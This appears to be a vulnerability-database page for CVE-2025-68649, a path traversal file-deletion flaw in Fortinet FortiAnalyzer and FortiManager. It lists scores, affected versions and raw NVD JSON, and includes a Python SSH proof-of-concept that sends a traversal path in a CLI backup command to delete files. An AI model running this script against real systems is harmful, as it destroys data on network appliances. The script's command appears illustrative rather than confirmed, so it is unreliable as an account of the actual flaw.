Security Vulnerability Report
CVE-2025-68649 CVSS 6.0 MEDIUM

CVE-2025-68649

Published: 2026-04-14 16:16:35
Last Modified: 2026-04-22 19:11:37

Description

An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests.

CVSS Details

CVSS Score
6.0 (secondary metric); the record also carries a primary metric of 6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H (secondary metric, AV:L)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H (primary metric, AV:N)
Weakness
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* (from 7.0.0 inclusive to 7.4.8 exclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* (from 7.6.0 inclusive to 7.6.5 exclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:* (from 7.0.0 inclusive to 7.4.8 exclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:* (from 7.6.0 inclusive to 7.6.5 exclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* (from 7.0.0 inclusive to 7.4.8 exclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* (from 7.6.0 inclusive to 7.6.5 exclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:* (from 7.0.0 inclusive to 7.4.8 exclusive) - VULNERABLE
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:* (from 7.6.0 inclusive to 7.6.5 exclusive) - VULNERABLE
FortiAnalyzer 7.6.0 - 7.6.4
FortiAnalyzer 7.4.0 - 7.4.7
FortiAnalyzer 7.2 all versions
FortiAnalyzer 7.0 all versions
FortiAnalyzer Cloud 7.6.0 - 7.6.4
FortiAnalyzer Cloud 7.4.0 - 7.4.7
FortiAnalyzer Cloud 7.2 all versions
FortiAnalyzer Cloud 7.0 all versions
FortiManager 7.6.0 - 7.6.4
FortiManager 7.4.0 - 7.4.7
FortiManager 7.2 all versions
FortiManager 7.0 all versions
FortiManager Cloud 7.6.0 - 7.6.4
FortiManager Cloud 7.4.0 - 7.4.7
FortiManager Cloud 7.2 all versions
FortiManager Cloud 7.0 all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2025-68649
# This PoC demonstrates the concept of a path traversal attack via CLI.
# Requires high privileges and access to the target.
import paramiko


def send_malicious_cli(target_ip, username, password, file_to_delete):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        print(f"[*] Connecting to {target_ip}...")
        client.connect(target_ip, username=username, password=password)
        # The vulnerability allows path traversal in a CLI command.
        # Constructing a path to escape the restricted directory.
        # Example: Deleting a config file from root filesystem.
        payload = f"execute backup config ../../../{file_to_delete}"
        print(f"[*] Sending crafted CLI request: {payload}")
        stdin, stdout, stderr = client.exec_command(payload)
        output = stdout.read().decode()
        error = stderr.read().decode()
        if output:
            print(f"[+] Command output: {output}")
        if error:
            print(f"[-] Error: {error}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        client.close()


if __name__ == "__main__":
    # Replace with actual target details
    # send_malicious_cli("192.168.1.1", "admin", "password", "system_config.db")
    pass

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-120 (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-68649",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T16:16:34.760",
    "lastModified": "2026-04-22T19:11:36.660",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 6.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.8,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.4.8",
                "matchCriteriaId": "038D5A52-3FF2-4340-9F26-8BB373350CEE"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndExcluding": "7.6.5",
                "matchCriteriaId": "00645EEE-3E67-4B98-BB49-B23AD1D60B54"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.4.8",
                "matchCriteriaId": "3EC50E48-4E81-4087-A889-B1D2D2C8456E"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndExcluding": "7.6.5",
                "matchCriteriaId": "EFE9F8B4-3B5B-43FC-A286-11A5DFB43393"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.4.8",
                "matchCriteriaId": "C8CAF4D2-5763-46F9-8FB4-43674B3CD8FE"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndExcluding": "7.6.5",
                "matchCriteriaId": "9F4A9AA3-C6AA-428B-AE1B-61F61658D642"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.4.8",
                "matchCriteriaId": "810BFAE5-3F80-438B-B909-B43BC95F5AD8"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndExcluding": "7.6.5",
                "matchCriteriaId": "CBA159E6-BBE9-4630-800A-5C4B3BAF23BB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-120",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}